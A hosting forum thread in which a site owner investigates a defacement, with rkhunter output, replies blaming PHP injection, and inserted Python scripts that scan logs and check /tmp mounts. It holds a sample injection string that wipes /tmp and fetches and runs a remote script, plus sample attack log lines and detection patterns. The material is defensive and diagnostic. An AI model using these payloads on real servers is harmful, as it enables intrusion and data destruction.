  1. #1
    Join Date
    Jun 2004
    Posts
    308

    server hacked ... advice needed

    My server hosting company sent me an email telling me my website may have been defaced, and that I should investigate my server for possible compromise as soon as possible. The defaced website is:

    www.AAAAAAAA.com/scgi-bin

    I found a file named indrx.php and its content is:
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>Hacked By CyBeRLORD</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9">
    <style type="text/css">
    <!--
    body,td,th {
            color: #FFFFFF;
    }
    body {
            background-color: #000000;
    }
    .style1 {font-size: 36px}
    a:link {
            color: #FFFFFF;
    }
    a:visited {
            color: #000000;
    }
    -->
    </style></head>
    
    <body>
    <table width="984" border="0">
      <tr>
        <td height="98">&nbsp;</td>
        <td align="center"><img src="http://lejyoner21.sitemynet.com/11.jpg" width="323" height="349"> </td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="114">&nbsp;</td>
        <td align="center"><span class="style1">Hacked By CyBeRLORD Owns Your System </span></td>
    <td align="center"><span class="style1">cyberlord@hiperturk.com </span></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="216">&nbsp;</td>
        <td align="center"><span class="style1"><a href="http://biyo.5gigs.com">www.cyber-soldiers.org and www.biyo.tk</a></span></td>
        <td>&nbsp;</td>
      </tr>
    </table>
    </body>
    </html>
    That folder was created on 28/10/2005. I deleted that folder and ran rkhunter, and the results were:

    Code:
    Checking binaries
    * Selftests
         Strings (command)                                        [ OK ]
    
    
    * System tools
      Performing 'known good' check...
       /bin/cat                                                   [ OK ]
       /bin/chmod                                                 [ OK ]
       /bin/chown                                                 [ OK ]
       /bin/dmesg                                                 [ BAD ]
       /bin/egrep                                                 [ OK ]
       /bin/env                                                   [ OK ]
       /bin/fgrep                                                 [ OK ]
       /bin/grep                                                  [ OK ]
       /bin/kill                                                  [ BAD ]
       /bin/login                                                 [ BAD ]
       /bin/ls                                                    [ OK ]
       /bin/mount                                                 [ BAD ]
       /bin/netstat                                               [ OK ]
       /bin/ps                                                    [ OK ]
       /bin/su                                                    [ OK ]
       /sbin/chkconfig                                            [ OK ]
       /sbin/depmod                                               [ OK ]
       /sbin/ifconfig                                             [ OK ]
       /sbin/init                                                 [ OK ]
       /sbin/insmod                                               [ OK ]
       /sbin/modinfo                                              [ OK ]
       /sbin/runlevel                                             [ OK ]
       /sbin/sysctl                                               [ OK ]
       /sbin/syslogd                                              [ OK ]
       /usr/bin/file                                              [ OK ]
       /usr/bin/find                                              [ OK ]
       /usr/bin/groups                                            [ OK ]
       /usr/bin/kill                                              [ OK ]
       /usr/bin/killall                                           [ OK ]
       /usr/bin/lsattr                                            [ OK ]
       /usr/bin/pstree                                            [ OK ]
       /usr/bin/sha1sum                                           [ OK ]
       /usr/bin/stat                                              [ OK ]
       /usr/bin/users                                             [ OK ]
       /usr/bin/w                                                 [ OK ]
       /usr/bin/watch                                             [ OK ]
       /usr/bin/who                                               [ OK ]
       /usr/bin/whoami                                            [ OK ]
    --------------------------------------------------------------------------------
    Rootkit Hunter found some bad or unknown hashes. This can be happen due replaced
    binaries or updated packages (which give other hashes). Be sure your hashes are
    fully updated (rkhunter --update). If you're in doubt about these hashes, contact
    the author (fill in the contact form).
    
    
    Check rootkits
    * Default files and directories
       Rootkit '55808 Trojan - Variant A'...                      [ OK ]
       ADM Worm...                                                [ OK ]
       Rootkit 'AjaKit'...                                        [ OK ]
       Rootkit 'aPa Kit'...                                       [ OK ]
       Rootkit 'Apache Worm'...                                   [ OK ]
       Rootkit 'Ambient (ark) Rootkit'...                         [ OK ]
       Rootkit 'Balaur Rootkit'...                                [ OK ]
       Rootkit 'BeastKit'...                                      [ OK ]
       Rootkit 'beX2'...                                          [ OK ]
       Rootkit 'BOBKit'...                                        [ OK ]
       Rootkit 'CiNIK Worm (Slapper.B variant)'...                [ OK ]
       Rootkit 'Danny-Boy's Abuse Kit'...                         [ OK ]
       Rootkit 'Devil RootKit'...                                 [ OK ]
       Rootkit 'Dica'...                                          [ OK ]
       Rootkit 'Dreams Rootkit'...                                [ OK ]
       Rootkit 'Duarawkz'...                                      [ OK ]
       Rootkit 'Flea Linux Rootkit'...                            [ OK ]
       Rootkit 'FreeBSD Rootkit'...                               [ OK ]
       Rootkit '****`it Rootkit'...                               [ OK ]
       Rootkit 'GasKit'...                                        [ OK ]
       Rootkit 'Heroin LKM'...                                    [ OK ]
       Rootkit 'HjC Kit'...                                       [ OK ]
       Rootkit 'ignoKit'...                                       [ OK ]
       Rootkit 'ImperalsS-FBRK'...                                [ OK ]
       Rootkit 'Irix Rootkit'...                                  [ OK ]
       Rootkit 'Kitko'...                                         [ OK ]
       Rootkit 'Knark'...                                         [ OK ]
       Rootkit 'Li0n Worm'...                                     [ OK ]
       Rootkit 'Lockit / LJK2'...                                 [ OK ]
       Rootkit 'MRK'...                                           [ OK ]
       Rootkit 'Ni0 Rootkit'...                                   [ OK ]
       Rootkit 'RootKit for SunOS / NSDAP'...                     [ OK ]
       Rootkit 'Optic Kit (Tux)'...                               [ OK ]
       Rootkit 'Oz Rootkit'...                                    [ OK ]
       Rootkit 'Portacelo'...                                     [ OK ]
       Rootkit 'R3dstorm Toolkit'...                              [ OK ]
       Rootkit 'RH-Sharpe's rootkit'...                           [ OK ]
       Rootkit 'RSHA's rootkit'...                                [ OK ]
       Sebek LKM                                                  [ OK ]
       Rootkit 'Scalper Worm'...                                  [ OK ]
       Rootkit 'Shutdown'...                                      [ OK ]
       Rootkit 'SHV4'...                                          [ OK ]
       Rootkit 'SHV5'...                                          [ OK ]
       Rootkit 'Sin Rootkit'...                                   [ OK ]
       Rootkit 'Slapper'...                                       [ OK ]
       Rootkit 'Sneakin Rootkit'...                               [ OK ]
       Rootkit 'Suckit Rootkit'...                                [ OK ]
       Rootkit 'SunOS Rootkit'...                                 [ OK ]
       Rootkit 'Superkit'...                                      [ OK ]
       Rootkit 'TBD (Telnet BackDoor)'...                         [ OK ]
       Rootkit 'TeLeKiT'...                                       [ OK ]
       Rootkit 'T0rn Rootkit'...                                  [ OK ]
       Rootkit 'Trojanit Kit'...                                  [ OK ]
       Rootkit 'Tuxtendo'...                                      [ OK ]
       Rootkit 'URK'...                                           [ OK ]
       Rootkit 'VcKit'...                                         [ OK ]
       Rootkit 'Volc Rootkit'...                                  [ OK ]
       Rootkit 'X-Org SunOS Rootkit'...                           [ OK ]
       Rootkit 'zaRwT.KiT Rootkit'...                             [ OK ]
    
    * Suspicious files and malware
       Scanning for known rootkit strings                         [ OK ]
       Scanning for known rootkit files                           [ OK ]
       Testing running processes...                               [ OK ]
       Miscellaneous Login backdoors                              [ OK ]
       Miscellaneous directories                                  [ OK ]
       Software related files                                     [ OK ]
       Sniffer logs                                               [ OK ]
    
    * Trojan specific characteristics
       shv4
         Checking /etc/rc.d/rc.sysinit
           Test 1                                                 [ Clean ]
           Test 2                                                 [ Clean ]
           Test 3                                                 [ Clean ]
         Checking /etc/inetd.conf                                 [ Clean ]
         Checking /etc/xinetd.conf                                [ Clean ]
    
    * Suspicious file properties
       chmod properties
         Checking /bin/ps                                         [ Clean ]
         Checking /bin/ls                                         [ Clean ]
         Checking /usr/bin/w                                      [ Clean ]
         Checking /usr/bin/who                                    [ Clean ]
         Checking /bin/netstat                                    [ Clean ]
         Checking /bin/login                                      [ Clean ]
       Script replacements
         Checking /bin/ps                                         [ Clean ]
         Checking /bin/ls                                         [ Clean ]
         Checking /usr/bin/w                                      [ Clean ]
         Checking /usr/bin/who                                    [ Clean ]
         Checking /bin/netstat                                    [ Clean ]
         Checking /bin/login                                      [ Clean ]
    
    * OS dependant tests
     Linux
         Checking loaded kernel modules...                        [ OK ]
         Checking files attributes                                [ OK ]
         Checking LKM module path                                 [ OK ]
    
    
    Networking
    * Check: frequently used backdoors
    warning, got bogus tcp line.
      Port 2001: Scalper Rootkit                                  [ OK ]
      Port 2006: CB Rootkit                                       [ OK ]
      Port 2128: MRK                                              [ OK ]
      Port 14856: Optic Kit (Tux)                                 [ OK ]
      Port 47107: T0rn Rootkit                                    [ OK ]
      Port 60922: zaRwT.KiT                                       [ OK ]
    
    * Interfaces
         Scanning for promiscuous interfaces                      [ OK ]
    
    System checks
    * Allround tests
       Checking hostname... Found. Hostname is host.indexsignal.com
       Checking for passwordless user accounts... OK
       Checking for differences in user accounts... OK. No changes.
       Checking for differences in user groups... OK. No changes.
       Checking boot.local/rc.local file...
         - /etc/rc.local                                          [ OK ]
         - /etc/rc.d/rc.local                                     [ OK ]
         - /usr/local/etc/rc.local                                [ Not found ]
         - /usr/local/etc/rc.d/rc.local                           [ Not found ]
         - /etc/conf.d/local.start                                [ Not found ]
         - /etc/init.d/boot.local                                 [ Not found ]
       Checking rc.d files...
         Processing........................................
                   ........................................
                   ........................................
                   .....................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ........................................
                   ..............
       Result rc.d files check                                    [ OK ]
       Checking history files
         Bourne Shell                                             [ OK ]
    
    * Filesystem checks
       Checking /dev for suspicious files...                      [ OK ]
       Scanning for hidden files...                      
    
    Application advisories
    * Application scan
       Checking Apache2 modules ...                               [ Not found ]
       Checking Apache configuration ...                          [ OK ]
    
    * Application version scan
       - Exim MTA 4.52                                            [ OK ]
       - GnuPG 1.2.1                                              [ Old or patched version ]
       - Apache [unknown]                                         [ OK ]
       - Bind DNS 9.2.4                                           [ OK ]
       - OpenSSL 0.9.7a                                           [ Old or patched version ]
       - PHP 4.3.11                                               [ OK ]
       - PHP 4.3.11                                               [ OK ]
       - Procmail MTA 3.22                                        [ OK ]
       - OpenSSH 3.6.1p2                                          [ Old or patched version ]
    
    
    
    Security advisories
    * Check: Groups and Accounts
       Searching for /etc/passwd...                               [ Found ]
       Checking users with UID '0' (root)...                      [ OK ]
    
    * Check: SSH
       Searching for sshd_config...
       Found /etc/ssh/sshd_config
       Checking for allowed root login... Watch out Root login possible. Possible risk!
        info:
        Hint: See logfile for more information about this issue
       Checking for allowed protocols...                          [ OK (Only SSH2 allowed) ]
    
    * Check: Events and Logging
       Search for syslog configuration...                         [ OK ]
       Checking for running syslog slave...                       [ OK ]
       Checking for logging to remote system...                   [ OK (no remote logging) ]
    
    ---------------------------- Scan results ----------------------------
    
    MD5
    MD5 compared: 115
    Incorrect MD5 checksums: 4
    
    File scan
    Scanned files: 342
    Possible infected files: 0
    
    Application scan
    Vulnerable applications: 3
    
    Scanning took 672 seconds

    I did my best to secure my server, following all the advice mentioned in the WebHostingTalk forum for the past 2 years, and I was updating everything in my box to secure it.

    There is only my personal website on this server, so I am the only user.

    How did that hacker get into my server?

    The only thing I remember that might have caused this is installing a PHP mailing list 2 weeks ago.

    And do I need to reformat my server? I hope not.

  2. #2
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    While it doesn't necessarily appear your system has been rooted, more than likely what was used was some form of PHP injection or some other exploit in a script, something like this as an example:

    somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in;

    Wouldn't hurt to perform other audits on your system anyway. Look through your logs; once you figure out how it was done you can install or disable something to further prevent it, like mod_security.

  3. #3
    Join Date
    Jun 2004
    Posts
    308
    I did ( last | more ) to check if someone else was SSHing into my server, but I found nothing... my IP address was the only thing logging into my server in October.

  4. #4
    Join Date
    Jun 2004
    Posts
    308
    I sent my box hosting company an email asking them if an OS reload was needed, and the reply was:

    (( An OS reload is not necessary in this case, it would seem you have done enough to help secure the server. The php email list script was the most likely cause of this if you have not had problems recently ))

    I will take a look at that PHP email list script code and see if I find something in it.

  5. #5
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Run this and see if you get anything:

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

  6. #6
    Join Date
    Nov 2003
    Location
    Oklahoma
    Posts
    146
    Just wondering if you are running cPanel? Either way, I would recommend you use the cPanel script to secure your tmp folder, or find the procedure to do this.
    Regards,
    Randy
    Okie Net Web Hosting

  7. #7
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    From what you posted your server does not look rooted. One very important thing to keep updated is the kernel. If you keep your kernel updated you are going to have a lot less of a chance of getting rooted by these annoying PHP injection attacks.

    If possible, limit your available PHP functions; it will help with these sorts of attacks.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service

  8. #8
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Run this and see if you get anything:

    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

    Do you mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    Because I am getting syntax errors.

  9. #9
    Join Date
    Apr 2003
    Location
    NC
    Posts
    3,093
    Quote Originally Posted by xmlxp
    Do you mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    Because I am getting syntax errors.
    do:

    egrep wget /usr/local/apache/domlogs/*

    But keep in mind there are more ways than just wget to put a script on your server.
    John W, CISSP, C|EH
    MS Information Security and Assurance
    ITEagleEye.com - Server Administration and Security
    Yawig.com - Managed VPS and Dedicated Servers with VIP Service
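The domlogs search in posts #5 and #9 only looks for "wget", and post #9 rightly notes there are other ways to pull a script onto the box. The scanner below is an added example for this thread, not the posters' own script: it URL-decodes each Apache log line and checks it against several heuristics drawn from the injected query string in post #2 (download tools, shell separators, /tmp, remote includes, traversal). It assumes Apache common/combined log lines, as cPanel writes them under /usr/local/apache/domlogs; the sample log lines and IPs are constructed.

```python
"""Scan Apache access logs for PHP injection and remote-fetch attempts."""
import glob
import re
from urllib.parse import unquote

# Heuristics run against the URL-decoded request line; each hit is a lead to
# review by hand, not proof of compromise.
SIGNATURES = {
    # download tools an injected command chain typically calls
    "remote_fetch": re.compile(r"\b(wget|curl|lynx|lwp-download)\b", re.I),
    # shell separators followed by a command, as in ";cd /tmp;rm -rf *"
    "shell_chain": re.compile(r"[;|`]\s*(cd|rm|perl|sh|bash|chmod|uname|id)\b", re.I),
    # writable scratch dirs used to drop and run the payload (see post #12)
    "tmp_dir": re.compile(r"/(var/)?tmp\b", re.I),
    # parameter=http://... : remote file inclusion into a PHP script
    "remote_include": re.compile(r"[?&][^=&]+=(https?|ftp)://", re.I),
    # directory traversal
    "dir_traversal": re.compile(r"(\.\./){2,}"),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)


def classify(line):
    """Return (ip, decoded request, [signature names]) or None for a non-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group("request"))  # %20 -> space, %3B -> ; and so on
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return m.group("ip"), decoded, hits


def scan(lines):
    """Return [(ip, decoded request, hits)] for every line with at least one hit."""
    out = []
    for line in lines:
        r = classify(line)
        if r and r[2]:
            out.append(r)
    return out


def scan_dir(log_dir="/usr/local/apache/domlogs"):
    """Scan every file in log_dir (the cPanel domlogs path from the thread)."""
    results = []
    for path in sorted(glob.glob(log_dir + "/*")):
        with open(path, errors="replace") as fh:
            results.extend(scan(fh))
    return results


# Constructed sample log: two benign requests, then three attack patterns
# (the first is the query string quoted in post #2).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Oct/2005:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.5 - - [28/Oct/2005:03:14:09 +0000] "GET /images/logo.gif HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.77 - - [28/Oct/2005:03:15:41 +0000] "GET /somescript.php?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://somesite.com/.it/in;perl%20in; HTTP/1.1" 200 331 "-" "libwww-perl/5.79"
198.51.100.77 - - [28/Oct/2005:03:15:44 +0000] "GET /mail/index.php?page=http://198.51.100.77/cmd.txt? HTTP/1.1" 200 14 "-" "libwww-perl/5.79"
198.51.100.77 - - [28/Oct/2005:03:16:02 +0000] "GET /cgi-bin/view.cgi?page=../../../../etc/passwd HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
"""

if __name__ == "__main__":
    for ip, req, hits in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip}  {','.join(hits)}  {req}")
```

Run scan_dir() on the real box to cover every domlog; a 200 status next to a hit means the script answered the request and deserves a closer look.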

  10. #10
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by rhenderson
    Just wondering if you are running cPanel? Either way, I would recommend you use the cPanel script to secure your tmp folder, or find the procedure to do this.
    I am using

    WHM 10.6.0 cPanel 10.8.0-S59
    RedHat Enterprise 3 i686 - WHM X v3.1.0

    and did all the necessary security tweaks needed for cPanel.

  11. #11
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by eth00
    From what you posted your server does not look rooted. One very important thing to keep updated is the kernel. If you keep your kernel updated you are going to have a lot less of a chance of getting rooted by these annoying PHP injection attacks.

    If possible, limit your available PHP functions; it will help with these sorts of attacks.
    I did update the kernel to 2.4.21-37.EL on the second day of release.

    PHP open_basedir protection is enabled
    PHP safe mode is on

    and did everything in here:
    http://www.hostinglife.com/security.php

    Where can I read about these annoying PHP injection attacks?

  12. #12
    Join Date
    Nov 2003
    Location
    Oklahoma
    Posts
    146
    Quote Originally Posted by xmlxp
    I am using

    WHM 10.6.0 cPanel 10.8.0-S59
    RedHat Enterprise 3 i686 - WHM X v3.1.0

    and did all the necessary security tweaks needed for cPanel.
    I was talking about /scripts/securetmp from SSH. Without securing /tmp and /var/tmp, it leaves a hole for PHP scripts to get in and be executed, causing a problem like you described.

    Good Luck
    Regards,
    Randy
    Okie Net Web Hosting
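A way to confirm the state post #12 is after, as an added example that is not cPanel's /scripts/securetmp and does not change anything: it parses a /proc/mounts-style table and reports whether the filesystem backing /tmp and /var/tmp carries noexec and nosuid. Assumptions: securetmp's effect is a /tmp mounted with noexec,nosuid (with /var/tmp pointing at it), the symlink resolver is injectable so the constructed samples run offline, and the loop file name in the sample is made up.

```python
"""Check whether /tmp and /var/tmp are mounted with noexec and nosuid."""
import os

REQUIRED = {"noexec", "nosuid"}
WATCHED = ("/tmp", "/var/tmp")


def parse_mounts(text):
    """Map mount point -> set of mount options from /proc/mounts-style lines."""
    mounts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or line.startswith("#"):
            continue
        mounts[parts[1]] = set(parts[3].split(","))
    return mounts


def effective_mount(path, mounts):
    """Longest mount point covering path (so /var/tmp may fall under /var or /)."""
    best = None
    for mp in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best):
                best = mp
    return best


def check_tmp(text, resolve=None):
    """Return {watched path: (mount point, sorted missing options)}.

    resolve maps a path to its real path, following the /var/tmp -> /tmp
    symlink securetmp is assumed to create; defaults to os.path.realpath.
    """
    resolve = resolve or os.path.realpath
    mounts = parse_mounts(text)
    report = {}
    for path in WATCHED:
        mp = effective_mount(resolve(path), mounts)
        opts = mounts.get(mp, set())
        report[path] = (mp, sorted(REQUIRED - opts))
    return report


# Constructed samples: a default layout where /tmp simply lives on / and
# /var/tmp on /var, and the same box after /tmp is a separate noexec,nosuid mount.
BEFORE = """\
/dev/sda1 / ext3 rw 0 0
/dev/sda2 /var ext3 rw 0 0
none /proc proc rw 0 0
"""
AFTER = BEFORE + "/tmp.img /tmp ext3 rw,noexec,nosuid,loop=/dev/loop0 0 0\n"

if __name__ == "__main__":
    with open("/proc/mounts") as fh:
        for path, (mp, missing) in check_tmp(fh.read()).items():
            state = "OK" if not missing else "missing " + ",".join(missing)
            print(f"{path:9} on {mp:6} {state}")
```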

  13. #13
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by eth00
    do:

    egrep wget /usr/local/apache/domlogs/*

    But keep in mind there are more ways than just wget to put a script on your server.
    The output was nothing:


    root@host [~]# egrep wget /usr/local/apache/domlogs/*
    root@host [~]#

  14. #14
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Quote Originally Posted by xmlxp
    Do you mean #grep [ filename ] for every file in /usr/local/apache/domlogs/ ?

    or grep "wget" $files; done;[ filename ]

    Because I am getting syntax errors.
    Nope, just as I have it, copy and paste.

  15. #15
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Nope, just as I have it, copy and paste.
    root@host [/]# /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    -bash: syntax error near unexpected token `do'

  16. #16
    Join Date
    Mar 2002
    Location
    St. Louis, MO
    Posts
    1,379
    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    That exact line; "for files in" is part of the command. Doesn't mean you'll turn up anything, but it wouldn't hurt to check.

  17. #17
    Join Date
    Jun 2004
    Posts
    308
    Quote Originally Posted by DigiCrime
    Code:
    for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    That exact line; "for files in" is part of the command. Doesn't mean you'll turn up anything, but it wouldn't hurt to check.
    The output was nothing:

    Code:
    root@host [~]#for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;
    root@host [~]#
    Last edited by XMLxp; 10-31-2005 at 07:12 PM.
